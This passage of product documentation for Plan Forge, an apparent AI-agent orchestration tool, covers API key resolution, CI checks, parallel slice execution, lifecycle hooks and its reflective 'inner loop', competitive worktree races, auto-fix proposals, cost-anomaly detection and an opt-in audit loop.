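console.log(calibrate(1.5, runs));   // 3 (historical ratio is 2x)
console.log(adaptThreshold(6, 0.1)); // 7
console.log(adaptThreshold(6, 0.7)); // 5
```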

Preview costs: pforge run-plan --estimate docs/plans/Phase-7.md
Review spend: pforge cost or Dashboard Cost tab
Agent-per-slice routing: Override model per slice with --model flag
Reduce context: Use targeted Context: lists per slice (see Chapter 4)

API Key Configuration

API keys for external providers (xAI Grok, OpenAI) are resolved in order: environment variable → .forge/secrets.json → null.

For local development, store keys in the gitignored .forge/secrets.json:

.forge/secrets.json

{
  "XAI_API_KEY": "xai-...",
  "OPENAI_API_KEY": "sk-..."
}

The .forge/ directory is in .gitignore by default, so secrets stored there are not committed.
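
The resolution order can be sketched as a short-circuit lookup. `resolveApiKey` is a hypothetical helper; a caller would pass `process.env` and the parsed contents of .forge/secrets.json.

```javascript
// Hypothetical resolver mirroring the documented order:
// environment variable -> .forge/secrets.json -> null.
function resolveApiKey(name, env, secrets) {
  return env[name] || (secrets && secrets[name]) || null;
}

const secrets = { XAI_API_KEY: "xai-from-file", OPENAI_API_KEY: "sk-from-file" };

console.log(resolveApiKey("XAI_API_KEY", { XAI_API_KEY: "xai-from-env" }, secrets)); // xai-from-env
console.log(resolveApiKey("OPENAI_API_KEY", {}, secrets)); // sk-from-file
console.log(resolveApiKey("XAI_API_KEY", {}, {}));         // null
```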

CI Integration

Add Plan Forge validation to your GitHub Actions PR workflow:

.github/workflows/plan-forge-validate.yml

- uses: srnichols/plan-forge-validate@v1
  with:
    analyze: true          # Run consistency scoring
    sweep: true            # Check for TODO/FIXME markers
    threshold: 60          # Minimum analyze score to pass

PRs that fail the threshold are blocked from merging. The action validates file counts, checks for unresolved placeholders, and runs pforge analyze.

Cloud Agent Execution

GitHub's Copilot cloud agent works on issues autonomously. Plan Forge integrates via .github/copilot-setup-steps.yml, which provisions the agent with Node.js, guardrails, MCP tools, and smith verification before it starts coding.

Parallel Execution

The orchestrator builds a DAG from [P] tags and [depends: Slice N] declarations. Independent slices run concurrently when workers are available. Merge checkpoints validate that all parallel branches resolved cleanly.

Conflict detection: If two parallel slices modify overlapping [scope:] paths, the orchestrator flags the conflict before execution starts.
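
A rough sketch of the conflict check, under stated assumptions: the slice shape `{ id, parallel, scope }` is hypothetical, and "overlap" here means an identical path or one path nested inside the other, whereas the real orchestrator may use glob matching.

```javascript
// Two paths overlap when they are equal or one contains the other.
function pathsOverlap(a, b) {
  const norm = (p) => p.replace(/\/+$/, ""); // drop trailing slashes
  const [x, y] = [norm(a), norm(b)];
  return x === y || x.startsWith(y + "/") || y.startsWith(x + "/");
}

// Hypothetical pre-flight check over slices tagged [P].
function findScopeConflicts(slices) {
  const parallel = slices.filter((s) => s.parallel);
  const conflicts = [];
  for (let i = 0; i < parallel.length; i++) {
    for (let j = i + 1; j < parallel.length; j++) {
      const shared = parallel[i].scope.filter((p) =>
        parallel[j].scope.some((q) => pathsOverlap(p, q))
      );
      if (shared.length > 0) {
        conflicts.push({ slices: [parallel[i].id, parallel[j].id], paths: shared });
      }
    }
  }
  return conflicts;
}

const conflicts = findScopeConflicts([
  { id: 2, parallel: true, scope: ["src/auth/", "src/db/users.ts"] },
  { id: 3, parallel: true, scope: ["src/auth/tokens.ts"] },
  { id: 4, parallel: true, scope: ["docs/"] },
]);
console.log(JSON.stringify(conflicts));
// [{"slices":[2,3],"paths":["src/auth/"]}]
```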

Resume and Retry

Terminal

# Resume from slice 3 after fixing a failure
pforge run-plan docs/plans/Phase-7.md --resume-from 3

# Dry run, parse and validate without executing
pforge run-plan docs/plans/Phase-7.md --dry-run

When a gate fails, fix the issue manually, then resume. Completed slices are skipped; only the remaining slices execute.

OpenBrain Memory

The OpenBrain integration bridges the 4-session pipeline with long-term, cross-session context. Prior decisions, patterns, and postmortems are automatically searched and injected at the start of each session. After every run, lessons are captured for future phases.

As of v3.6, OpenBrain is the documented L3 memory layer, still optional, but loud and easy to enable. Check status with pforge brain status; see install options with pforge brain hint. Plan Forge works without it; the inner loop (Reflexion, Auto-skills, Federation) only improves over time with it. See Project History → v3.6.

Install via extension: pforge ext add plan-forge-memory

LiveGuard Lifecycle Hooks

Three hooks fire automatically during agent sessions to enforce operational safety:

Hook	Trigger	Behavior	Blocking
PreDeploy	Before deploy-related file writes or commands	Runs `forge_secret_scan` + `forge_env_diff`, blocks on findings	Yes
PostSlice	After every slice commit	Runs `forge_drift_report`, warns on drift regression	No (advisory)
PreAgentHandoff	At session start when resuming work	Injects LiveGuard context into agent prompt	No

Configure in .forge.json:

.forge.json

{
  "hooks": {
    "preDeploy": { "blockOnSecrets": true, "warnOnEnvGaps": true, "scanSince": "HEAD~1" },
    "postSlice": { "silentDeltaThreshold": 5, "warnDeltaThreshold": 10, "scoreFloor": 70 },
    "preAgentHandoff": { "injectContext": true, "cacheMaxAgeMinutes": 30, "minAlertSeverity": "medium" }
  }
}

See Chapter 16 — What Is LiveGuard? for the full operational intelligence overview.

📄 Full reference: capabilities, CLI Reference — run-plan

Deep Dive · Act II, Forge · Master Narrative

The Self-Deterministic Agent Loop

The canonical overview. How Plan Forge's deterministic slice executor, the Phase-25 reflective layer, and the Phase-26 competitive layer compose into a single self-deterministic agent loop.

New here? Plain-English version. “Self-deterministic” is a mouthful. Here's what it really means: Plan Forge runs the same way every time (same plan + same config = same outcome, no surprises), but it also learns from every run and uses that knowledge to make the next run smarter. The execution stays predictable; the context gets richer.

Deterministic part: the slice executor. No random model picking, no hidden retries that change the result. You can re-run a plan and get the same answer.
Self-learning part: the “inner loop” (reflection on what worked) and “competitive loop” (multiple models racing) feed lessons back into the next slice or plan.
Safety: every learning signal is opt-in or advisory. Nothing silently changes a run you've already started.

This chapter is the master narrative tying it all together. If you want the focused deep dives, jump to Inner Loop (reflection) or Competitive Loop (racing).

Canonical reference. Start here if you want the whole picture. The companion chapters, The Inner Loop (Phase-25 reflective layer) and The Competitive Loop (Phase-26 worktree race, auto-fix, cost anomalies), drill into the individual subsystems.

What "self-deterministic" means

Plan Forge's slice executor is deterministic: same plan, same config, same model routing, same outcome. On top of that spine, the Phase-25 and Phase-26 subsystems let the loop observe itself and feed what it learns back into the next slice, the next plan, or a sibling project. The execution contract stays deterministic; the loop's context gets progressively better-informed. That combination is what we mean by self-deterministic:

Determinism at the execution boundary: no randomized control flow, no hidden model selection.
Reflective feedback at the learning boundary: trajectories, postmortems, auto-skills, and advisory signals.
Every signal is opt-in or advisory by default; nothing silently changes a deterministic plan run.

Diagram A — System-wide state flow

The outer pipeline is the same one Plan Forge has always had. The inner loop adds callback arrows that let later stages feed earlier stages without breaking the forward progression.

System-wide state flow, the deterministic outer pipeline with callback arrows that let later stages feed earlier stages.

Two things to notice. First, every backward arrow from Execute, Sweep, and Review is opt-in or advisory by default, so the forward pipeline stays honest. Second, the arrow from Execute back to Harden crosses a plan boundary: a postmortem written at the end of this run is read by the hardener at the start of the next one.

Diagram B — Inner-loop callback graph

Zooming into a single slice, here is what happens at the slice boundary and how each Phase-25 and Phase-26 subsystem feeds something downstream: the next slice, the next plan's hardener, or a Dashboard promotion surface.

Inner-loop callback graph, slice-boundary signals (L2, L4, L5, L6, L8, C1, C2, C3) feeding the next slice, the next hardener, and Dashboard surfaces.

The Phase-25 subsystems are labeled L1–L8 in the capabilities surface (forge_capabilities → innerLoop); the Phase-26 subsystems (C1 competitive, C2 auto-fix, C3 cost-anomaly) extend the same surface. Every node in the diagram corresponds to one entry in INNER_LOOP_SURFACE.subsystems.

Subsystem roll-call

Every subsystem, the stage at which it fires, and where its output shows up. See the companion chapters for mechanics and configuration.

Subsystem	Fires at	Output lands in	Default posture
Reflexion (L7)	Gate fail → retry	Next attempt's prompt	Always on
Trajectory (L8)	Slice pass	`.forge/trajectories/`	Always on
Auto-skill library (L2)	Slice pass → next slice	`.forge/auto-skills/`	Always on
Adaptive gate synthesis (L6)	Pre-flight	Stdout + Dashboard promotion surface	Suggest (never mutates plans)
Postmortem (L5)	Run end	`.forge/plans/<basename>/postmortem-*.json`	Always on (retention 10)
Federation (L4-lite)	Brain miss → cross-repo read	In-memory recall	Off (opt-in, absolute local paths)
Reviewer (L4)	Gate-check	Gate-check response, Dashboard	Off, advisory-only
Competitive (C1)	Slice start (marked competitive)	Winner's worktree → tree	Off (opt-in)
Auto-fix (C2)	Gate fail + small diff	`.forge/proposed-fixes/`	Advisory (never auto-apply)
Cost-anomaly (C3)	Every slice	`.forge/cost-anomalies.jsonl`, Dashboard	Advisory (detection only)

Why this matters

The individual subsystems are useful on their own. The mesh is what turns a slice runner into a self-deterministic loop: a trajectory written today becomes part of tomorrow's planning context; a cost anomaly noticed this run becomes the reason next run's hardener picks a cheaper model for that slice; a gate command accepted three times graduates into the validation template for that domain. None of this changes the deterministic execution contract; it only changes the information the deterministic executor runs with.

Companion chapters. The Inner Loop covers L1–L8 (Phase-25) mechanics and configuration. The Competitive Loop covers C1–C3 (Phase-26). Dashboard → Inner Loop tab shows live state for all ten subsystems.


Deep Dive · Act II, Forge

The Inner Loop

Seven subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, and the opt-in reviewer) that turn every slice into a research step.

New here? Decode the seven words first. The subtitle drops a lot of jargon. Here's a one-line plain-English read on each:

Reflexion: when a slice fails its gate, the model gets a short summary of that failed attempt before retrying. (Like reviewing your own essay before rewriting it.)
Trajectories: short notes the model leaves for itself about what worked and what didn't. Saved per slice.
Auto-skills: if a pattern keeps showing up across slices, Plan Forge auto-generates a reusable skill so the next slice starts from a higher baseline.
Gate synthesis: advisory suggestions for validation gates on slices that don't declare one.
Postmortems: a short structured summary written after every run: what retried, what cost more, what drifted.
Federation: optionally let one project read lessons recorded by sibling projects on the same machine, so each benefits from the others' experience. Read-only.
Opt-in reviewer: a second AI checks the slice before it commits. You decide whether to enable it.

All seven default to off, advisory, or read-only. Existing workflows don't change unless you opt in.

Opt-in by default. All seven subsystems default to off / suggest / read-only for existing projects. New installs get best-defaults. Toggle everything from the Dashboard → Config tab. Nothing in your current workflow breaks.

For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.

The Inner Loop — State Flow

The deterministic slice executor (Phase-1 through Phase-24) is the spine. The Phase-25 subsystems bolt on reflective behavior at specific transitions; they never replace the spine, only enrich it.

The Seven Subsystems

Each subsystem has a single job, a single config key (if any), and a single storage artifact. Add them up and you get a closed research loop where every run teaches the next.

1. Reflexion (L7) — the retry gets context

When a slice's validation gate fails, the orchestrator builds a compact Markdown block with the gate command, model, duration, and the stderr tail (≤2KB). That block is injected into the next attempt's prompt so the worker reasons about its prior failure instead of blindly trying the same thing.

Module: pforge-mcp/memory.mjs → buildReflexionBlock()
Config: none, always on
Storage: in-memory per attempt
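
A minimal sketch of how such a block could be assembled. The function name `buildReflexionSketch`, its input field names, and the Markdown layout are assumptions for illustration; the actual `buildReflexionBlock()` signature is not shown in this chapter, and the 2KB cap is approximated here as 2,048 characters.

```javascript
// Hypothetical sketch, not the real buildReflexionBlock().
const STDERR_TAIL_CHARS = 2048; // approximates the "≤2KB" stderr tail

function buildReflexionSketch({ gateCommand, model, durationMs, stderr }) {
  // Keep only the end of stderr, where the failing output usually sits.
  const tail = String(stderr ?? "").slice(-STDERR_TAIL_CHARS);
  return [
    "### Previous attempt failed",
    `- Gate command: ${gateCommand}`,
    `- Model: ${model}`,
    `- Duration: ${durationMs} ms`,
    "",
    "stderr (tail):",
    tail,
  ].join("\n");
}
```

The returned string would be injected into the next attempt's prompt; nothing is written to disk, which matches the in-memory storage noted above.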

2. Trajectories (L8) — what actually happened

On slice pass, Plan Forge extracts the sentinel-wrapped note the worker produced (…), caps it at 500 words, and writes it to disk. Postmortems and federation consumers read these for compact run narratives.

Module: pforge-mcp/memory.mjs → writeTrajectory()
Config: none, always on
Storage: .forge/trajectories/<slice>/<iso>.md
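
The word cap and storage path can be sketched as follows. Both helper names are hypothetical, sentinel extraction is omitted because the sentinel format is not given here, and using the raw ISO timestamp as the file name is an assumption.

```javascript
// Hypothetical helpers; the real writeTrajectory() may differ.
const MAX_WORDS = 500; // word cap from the text above

function capWords(note, maxWords = MAX_WORDS) {
  // Splits on whitespace, so runs of spaces and newlines collapse to single spaces.
  const words = note.trim().split(/\s+/).filter(Boolean);
  return words.slice(0, maxWords).join(" ");
}

function trajectoryPath(sliceId, when = new Date()) {
  // Assumption: <iso> is Date#toISOString(). The colons it contains are not
  // valid in Windows file names, so a real implementation may sanitize them.
  return `.forge/trajectories/${sliceId}/${when.toISOString()}.md`;
}
```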

3. Auto-skills (L2) — patterns that earn promotion

A slice that passes gets captured as a candidate auto-skill with its domain keywords, gate commands, and a SHA prefix. Before the next slice, the orchestrator retrieves matching skills (ranked by reuse count) and injects them into the prompt. A skill promotes to "stable" once its reuse count hits the threshold (default 3).

Module: pforge-mcp/memory.mjs → retrieveAutoSkills() / writeAutoSkill()
Config: none — defaults are Dashboard-editable in Phase-26
Storage: .forge/auto-skills/*.md
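
As a rough illustration of retrieval and promotion, the sketch below filters skills by keyword overlap, ranks them by reuse count, and labels a skill "stable" once it reaches the default threshold of 3. The record shape (`keywords`, `reuseCount`), the matching rule, and the function name are assumptions, not the actual `retrieveAutoSkills()` contract.

```javascript
// Hypothetical sketch of ranking and promotion.
const STABLE_THRESHOLD = 3; // default reuse count for promotion

function retrieveSkillsSketch(skills, sliceKeywords) {
  const wanted = new Set(sliceKeywords.map((k) => k.toLowerCase()));
  return skills
    // Keep skills that share at least one domain keyword with the slice.
    .filter((s) => s.keywords.some((k) => wanted.has(k.toLowerCase())))
    // Most-reused first; filter() returned a copy, so the input is not mutated.
    .sort((a, b) => b.reuseCount - a.reuseCount)
    .map((s) => ({
      ...s,
      status: s.reuseCount >= STABLE_THRESHOLD ? "stable" : "candidate",
    }));
}
```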

4. Adaptive gate synthesis (L6) — Tempering advises your plans

During plan pre-flight the orchestrator scans every slice. If a slice's title or file list matches a Tempering domain profile (domain / integration / controller) but declares no validation gate, it prints a suggested command using the project's Tempering coverage minimum and runtime budget. Default mode is suggest; set mode: "off" to silence it.

Module: pforge-mcp/orchestrator.mjs → synthesizeGateSuggestions()
Config: runtime.gateSynthesis: { mode, domains }
Storage: stdout only (never mutates your plan)
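
A simplified sketch of the pre-flight scan. It assumes a slice shape of `{ title, files, gate }` and matches domains by plain substring, both of which are guesses; the real `synthesizeGateSuggestions()` also builds a suggested command from the Tempering coverage minimum and runtime budget, which is left out here because its format is not shown.

```javascript
// Hypothetical sketch; matching rule and slice shape are assumptions.
function synthesizeGateSuggestionsSketch(slices, config = {}) {
  const {
    mode = "suggest",
    domains = ["domain", "integration", "controller"],
  } = config;
  if (mode === "off") return []; // silenced

  const suggestions = [];
  for (const slice of slices) {
    if (slice.gate) continue; // slice already declares a validation gate
    const haystack = [slice.title, ...(slice.files ?? [])].join(" ").toLowerCase();
    const domain = domains.find((d) => haystack.includes(d.toLowerCase()));
    if (domain) suggestions.push({ slice: slice.title, domain });
  }
  return suggestions; // printed only; the plan itself is never modified
}
```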

5. Plan postmortems (L5) — the hardener learns from you

After every run, pass or fail, Plan Forge writes a JSON postmortem with retriesPerSlice, gateFlaps, topFailureReason, costDelta, and driftDelta (deltas vs the prior run). Retention is 10 per plan. The Step-2 hardener now reads the newest 3 postmortems and folds their signals into the Scope Contract, closing the loop from execution back into planning.

Module: pforge-mcp/orchestrator.mjs → buildPlanPostmortem() / writePlanPostmortem()
Config: retention count via maxRunHistory-style defaults
Storage: .forge/plans/<plan-basename>/postmortem-*.json
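
The two numbers in this section (keep 10, read the newest 3) can be sketched as below. The entry shape `{ file, writtenAt }` and both function names are hypothetical; how the real implementation orders postmortem files is not stated here.

```javascript
// Hypothetical sketch of retention and hardener selection.
const RETENTION = 10;     // postmortems kept per plan
const HARDENER_READS = 3; // newest postmortems the hardener reads

function planRetention(postmortems, keep = RETENTION) {
  // Newest first, sorted on a copy so the caller's array is untouched.
  const sorted = [...postmortems].sort((a, b) => b.writtenAt - a.writtenAt);
  return { keep: sorted.slice(0, keep), prune: sorted.slice(keep) };
}

function forHardener(postmortems, count = HARDENER_READS) {
  return planRetention(postmortems, count).keep;
}
```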

6. Cross-project federation (L4-lite) — one project's memory helps another

Opt-in. When a cross.* brain recall misses L3 (OpenBrain), the facade fans out to the repos listed in brain.federation.repos[] and reads their .forge/brain/<entity>/<id>.json files. Access is read-only and limited to absolute local paths; URLs and relative paths are rejected by contract.

Module: pforge-mcp/brain.mjs → federationRead()
Config: brain.federation: { enabled, repos: [] }, defaults off
Security: absolute-local-paths-only (D9); .. rejected; defense-in-depth path containment check
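
The path contract above might be checked along these lines. This is a dependency-free sketch with hypothetical function names; it treats POSIX paths and Windows drive-letter paths as absolute (UNC paths are rejected for simplicity), and the segment whitelist for `entity` and `id` is an assumption standing in for the containment check.

```javascript
// Hypothetical sketch of the federation path rules, not federationRead() itself.
function isAllowedFederationRepo(repoPath) {
  if (typeof repoPath !== "string" || repoPath.length === 0) return false;
  // Reject anything that looks like a URL (scheme://...).
  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(repoPath)) return false;
  // Absolute local paths only: "/..." or "C:\..." / "C:/...".
  const isAbsolute = repoPath.startsWith("/") || /^[A-Za-z]:[\\/]/.test(repoPath);
  if (!isAbsolute) return false;
  // Reject any ".." segment.
  return !repoPath.split(/[\\/]/).includes("..");
}

function federationEntityPath(repoPath, entity, id) {
  if (!isAllowedFederationRepo(repoPath)) return null;
  // Containment: entity and id must be single, plain path segments.
  const safeSegment = /^[A-Za-z0-9._-]+$/;
  for (const part of [entity, id]) {
    if (!safeSegment.test(part) || part === "." || part === "..") return null;
  }
  const root = repoPath.replace(/[\\/]+$/, ""); // drop trailing separators
  return `${root}/.forge/brain/${entity}/${id}.json`;
}
```

For example, `federationEntityPath("/repos/sibling", "decision", "abc-1")` yields a path inside that repo's `.forge/brain/` directory, while a URL, a relative path, or a `..` segment yields `null`.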

7. Reviewer-agent in-loop (L4) — cheap second pair of eyes

Opt-in. When enabled, the brain.gate-check responder invokes a speed-quorum reviewer on each slice's diff summary and attaches a verdict to the response (score, critical, summary, durationMs). Advisory-only by default: critical verdicts do not block the next slice unless operators explicitly set blockOnCritical: true. Blocking mode enters Phase-26 after calibration data exists.

Module: pforge-mcp/brain.mjs → invokeReviewer()
Config: runtime.reviewer: { enabled, quorumPreset, blockOnCritical, timeoutMs }
Defaults: enabled=false, quorumPreset="speed" (D5), blockOnCritical=false (D6), timeoutMs=30000
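
The advisory-versus-blocking rule reduces to a small predicate. The sketch below assumes `verdict.critical` is a boolean and uses a hypothetical function name; the defaults are the ones listed above.

```javascript
// Hypothetical sketch of the blocking decision.
const REVIEWER_DEFAULTS = {
  enabled: false,
  quorumPreset: "speed",
  blockOnCritical: false,
  timeoutMs: 30000,
};

function shouldBlockNextSlice(verdict, reviewerConfig = {}) {
  const cfg = { ...REVIEWER_DEFAULTS, ...reviewerConfig };
  if (!cfg.enabled || !verdict) return false; // reviewer off or no verdict
  // Advisory unless the operator explicitly opted into blocking.
  return Boolean(cfg.blockOnCritical) && verdict.critical === true;
}
```

With the defaults, a critical verdict is attached to the gate-check response but never stops the run.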

Configuration Summary

Everything the Inner Loop exposes lives under two keys in .forge.json, and every key has a toggle in the Dashboard → Config tab.

{
  "runtime": {
    "gateSynthesis": { "mode": "suggest", "domains": ["domain", "integration", "controller"] },
    "reviewer":      { "enabled": false, "quorumPreset": "speed", "blockOnCritical": false, "timeoutMs": 30000 }
  },
  "brain": {
    "federation":    { "enabled": false, "repos": [] }
  }
}

Phase-26 additions (v2.58.0)

Three more subsystems close the loop further: the slice executor can now race strategies, draft its own patches when a gate fails, and flag token-cost drift without halting a run.

Competitive execution (C1): Opt-in worktree race. Two or more strategies run the same slice under isolated git worktrees; the winner is elected by gate result, then reviewer verdict, then a token-cost tie-breaker. Off by default. Config: innerLoop.competitive. See The Competitive Loop for the full flow.
Auto-fix patch proposals (C2): When a gate-fail trajectory suggests a small local correction, the orchestrator drafts a .patch file under .forge/proposed-fixes/. Advisory; nothing auto-applies unless applyWithoutReview: true.
Cost-anomaly detection (C3): Slices whose token cost exceeds the per-model median by more than a factor of ratio (default 2.0) are recorded in .forge/cost-anomalies.jsonl. Detection only; never halts a run.

Additional config block (added by the v2.58 best-defaults preset for new installs; existing projects opt in):

{
  "innerLoop": {
    "competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
    "autoFix":     { "enabled": true, "applyWithoutReview": false },
    "costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
  }
}

All three are surfaced in the Dashboard's new Inner Loop tab alongside the Phase-25 subsystems.

See also: Chapter 2 — How It Works describes the Forge spine; this page describes the reflective layers the Inner Loop adds on top. The Competitive Loop covers the worktree-race mechanics in depth.


Deep Dive · Act II, Forge

The Competitive Loop

Worktree races with winner election, auto-fix proposals, and cost-anomaly detection: three opt-in inner-loop subsystems.

New here? Decode the jargon first. This chapter introduces three new tricks; here's what they actually do:

Worktree race: a worktree is a sandbox copy of your repo. Instead of one model trying a slice, Plan Forge can spawn 2–3 sandboxes in parallel, let different models compete, and pick whichever produces the best result. (A “winner election” is just “score them and choose one.”)
Auto-fix proposals: when a slice fails, the loop drafts a patch file in .forge/proposed-fixes/ for you to review. It never applies the fix on its own unless you explicitly allow that.
Cost-anomaly detection: watches token spend per slice. If a slice costs more than twice the recent median for its model, the anomaly is logged and shown in the Dashboard. Advisory only; doesn't stop the run.

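For existing projects, all three stay off until you opt in; new installs get the v2.58 best-defaults preset, which turns on auto-fix and cost-anomaly detection in advisory mode and leaves competitive execution off. Nothing here changes existing behavior unless you ask for it.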

Opt-in, advisory by default. Every subsystem on this page is opt-in and ships in advisory posture. Competitive execution is off by default; auto-fix drafts patches but never auto-applies; cost-anomaly detection never halts a run. See also The Inner Loop for the Phase-25 subsystems this chapter builds on.

For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.

Worktree race → winner election

When a slice is marked for competitive execution, the orchestrator spawns a worktree per strategy, runs each in isolation, and elects a single winner. Losing worktrees are cleaned up; only the winner's changes enter the working tree.

Competitive loop flowchart. Start: slice marked competitive. A decision node spawn-worktrees branches to Strategy A (.forge/worktrees/A/) and Strategy B (.forge/worktrees/B/). Both worktrees run a validation gate and then conditionally invoke a reviewer when innerLoop.reviewer.enabled is true. The two reviewer outputs converge on a winner-election decision node. The path labeled gate-pass-plus-best-reviewer-score promotes the winner to the working tree; the path labeled tie-on-gate-and-reviewer drops into a token-cost tie-breaker that feeds back into winner. Winner flows through clean-up of losing worktrees to slice-committed. A dotted secondary path connects gate-failure on either strategy to an auto-fix-proposal decision node, which routes small local diffs to .forge/proposed-fixes/*.patch and complex failures to a postmortem record. — Competitive worktree lifecycle, spawn, gate, reviewer, winner election, plus the auto-fix branch on gate failure.

Winner election rules

Election is deterministic. The orchestrator walks the rules in order and stops at the first one that produces a unique winner.

Gate result. Strategies whose validation gate failed are eliminated first. If only one strategy passes, it wins.
Reviewer score. If innerLoop.reviewer.enabled is true, the highest reviewer score among remaining strategies wins.
Token-cost tie-breaker. If reviewer is off or the top score is tied, the lowest total token cost wins. This keeps the loop cost-sensitive even under competitive execution.
Deterministic fallback. On a true tie across all three, the orchestrator picks the lexicographically first strategy name so reruns elect the same winner.
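
The four rules above can be read as a filter chain. The sketch below is an illustration under assumptions: the result shape (`strategy`, `gatePassed`, `reviewerScore`, `tokenCost`) and the `reviewerEnabled` option are hypothetical names, and returning `null` when every strategy fails its gate is a choice made here, not documented behavior.

```javascript
// Hypothetical sketch of the election order: gate, reviewer, cost, name.
function electWinner(results, { reviewerEnabled = false } = {}) {
  // 1. Gate result: failed strategies are eliminated first.
  let pool = results.filter((r) => r.gatePassed);
  if (pool.length === 0) return null; // no winner to promote
  if (pool.length === 1) return pool[0].strategy;

  // 2. Reviewer score: highest wins, if the reviewer is enabled.
  if (reviewerEnabled) {
    const top = Math.max(...pool.map((r) => r.reviewerScore));
    pool = pool.filter((r) => r.reviewerScore === top);
    if (pool.length === 1) return pool[0].strategy;
  }

  // 3. Token-cost tie-breaker: lowest total cost wins.
  const cheapest = Math.min(...pool.map((r) => r.tokenCost));
  pool = pool.filter((r) => r.tokenCost === cheapest);
  if (pool.length === 1) return pool[0].strategy;

  // 4. Deterministic fallback: lexicographically first strategy name.
  return pool.map((r) => r.strategy).sort()[0];
}
```

Because every step is a pure function of the recorded results, rerunning the election on the same inputs always names the same winner.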

Auto-fix patch proposals

When a slice's validation gate fails and the trajectory suggests a small local correction (single file, under a few hundred lines of diff), the orchestrator drafts a patch file instead of retrying blindly.

Patches are written to .forge/proposed-fixes/<fixId>.patch with metadata in .forge/fix-proposals.json.
Nothing is applied automatically. The operator (or a reviewer agent) must invoke applyFixProposal; the patch is git-apply-style so rollbackFixProposal can undo it cleanly.
To allow the orchestrator to apply patches itself on gate-fail retries, set innerLoop.autoFix.applyWithoutReview: true. This is off by default for a reason: review the patch first.

Cost-anomaly detection

Every slice's total token cost is compared against the rolling per-model median (default window: 20 runs). Ratios above innerLoop.costAnomaly.ratio (default 2.0) are logged to .forge/cost-anomalies.jsonl and surfaced in the Dashboard's Inner Loop tab.

Detection is advisory: anomalies never halt a run. The signal is there so you can investigate why a slice drifted (stale prompts, model degradation, a gate that's suddenly looping) before it shows up as a surprise on the month's bill.
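
A minimal sketch of the comparison, assuming `history` is an array of prior token costs for the same model, oldest first. The function names and the shape of the returned record are hypothetical; only the defaults (`ratio` 2.0, `medianWindow` 20) come from the configuration described here.

```javascript
// Hypothetical sketch of rolling-median anomaly detection.
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

function detectCostAnomaly(history, sliceCost, { ratio = 2.0, medianWindow = 20 } = {}) {
  const recent = history.slice(-medianWindow); // rolling window of latest runs
  if (recent.length === 0) return null;        // nothing to compare against
  const med = median(recent);
  if (med <= 0) return null;                   // avoid dividing by zero
  const observed = sliceCost / med;
  // Only ratios strictly above the threshold are recorded.
  return observed > ratio ? { sliceCost, median: med, ratio: observed } : null;
}
```

A non-null result is what would be appended as one line of `.forge/cost-anomalies.jsonl`, for instance via `JSON.stringify(result)`; the run continues either way.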

Configuration summary

All three subsystems live under a single innerLoop key in .forge.json. New installs receive these defaults via the v2.58 best-defaults preset; existing projects opt in per-subsystem.

{
  "innerLoop": {
    "competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
    "autoFix":     { "enabled": true, "applyWithoutReview": false },
    "costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
  }
}

See also: The Inner Loop covers the seven Phase-25 subsystems this chapter builds on. The Dashboard Inner Loop tab shows live state for all ten subsystems in one place.


Deep Dive · Act II, Forge

Audit Loop

Closed-loop bug discovery: content-audit scan → triage → fix, iterating until convergence or max rounds.

New here? Read this first. The audit loop is Plan Forge's way of finding bugs in a running app and fixing them automatically. Point it at your dev or staging server and it will:

Scan: visit every page/route and record what's broken (404s, blank pages, “Coming soon” placeholders, broken links).
Triage: sort each finding into one of three lanes (fix it now, ask a human, or I'm not sure).
Fix: for the “fix it now” lane, spawn a worker to apply the fix, then re-scan.
Repeat: keep going until no new bugs appear (“convergence”) or the round limit hits.

It works like a tireless QA tester that not only files bugs but closes them. It's off by default; you have to opt in. Production is permanently off-limits.

Audit loop drain flow: content-audit scanner produces findings, forge_triage_route classifies each into one of three lanes (bug -> forge_bug_register, spec -> forge_crucible_submit, classifier -> .forge/audits/ artifact), then spawnWorker applies fixes and the loop iterates. Activation via .forge.json#audit.mode (default off). Production environments are hard-blocked.

Off by default. The audit loop defaults to off. It never runs automatically unless you explicitly set audit.mode to "auto" or "always" in .forge.json. Production environments are always forbidden.

What It Does

The audit loop is a first-class Tempering subsystem that discovers bugs from a running system. It probes live routes against a dev or staging server, triages the findings into actionable lanes, and iterates until the finding count converges (no new issues found) or the maximum round limit is reached.

The Three Components

1. Content-Audit Scanner

pforge-mcp/tempering/scanners/content-audit.mjs HTTP-probes a set of routes against a live base URL and emits structured findings: HTTP status, page title, h1, word count, placeholder markers, and client-shell detection for hydrated SPAs.

Production guard: Reuses looksLikeProduction() from ui-playwright.mjs. The scanner refuses to crawl production URLs unless allowProduction: true is explicitly set, and the audit loop's forbidProduction config is immutably true.
Injectable fetcher: Tests use a mock fetcher, so the test suite makes no real HTTP requests.

2. Triage Router

pforge-mcp/tempering/triage.mjs: routeFinding(finding, classifier) routes each finding to one of three lanes:

Lane	Destination	What happens
`"bug"`	Bug Registry	Finding registered via `forge_bug_register`
`"spec"`	Crucible	Finding submitted as a new smelt (feature gap)
`"classifier"`	Local artifact	Proposal written to `.forge/audits/` for human review

Unknown classifier output fails safe to { lane: "bug", confidence: "low" }, so findings are never dropped.
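
The fail-safe behavior might look like the sketch below. It is synchronous for brevity and uses a hypothetical name; treating a thrown classifier error the same as unknown output is an assumption, and the `{ lane, payload, confidence }` shape is borrowed from the `forge_triage_route` description.

```javascript
// Hypothetical sketch of routing with a safe default.
const LANES = new Set(["bug", "spec", "classifier"]);

function routeFindingSketch(finding, classifier) {
  let result = null;
  try {
    result = classifier(finding);
  } catch {
    result = null; // assumption: a crashing classifier counts as unknown output
  }
  if (!result || !LANES.has(result.lane)) {
    // Unknown output: keep the finding, route it to the bug lane.
    return { lane: "bug", payload: finding, confidence: "low" };
  }
  return { lane: result.lane, payload: finding, confidence: result.confidence ?? "low" };
}
```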

3. Drain Loop

pforge-mcp/tempering/drain.mjs: runTemperingDrain(opts) orchestrates the full cycle:

Run all registered scanners (content-audit + any others)
Triage each finding through routeFinding()
Apply fixes for bug-lane findings (via injectable spawnWorker)
Re-scan to check if fixes resolved the issues
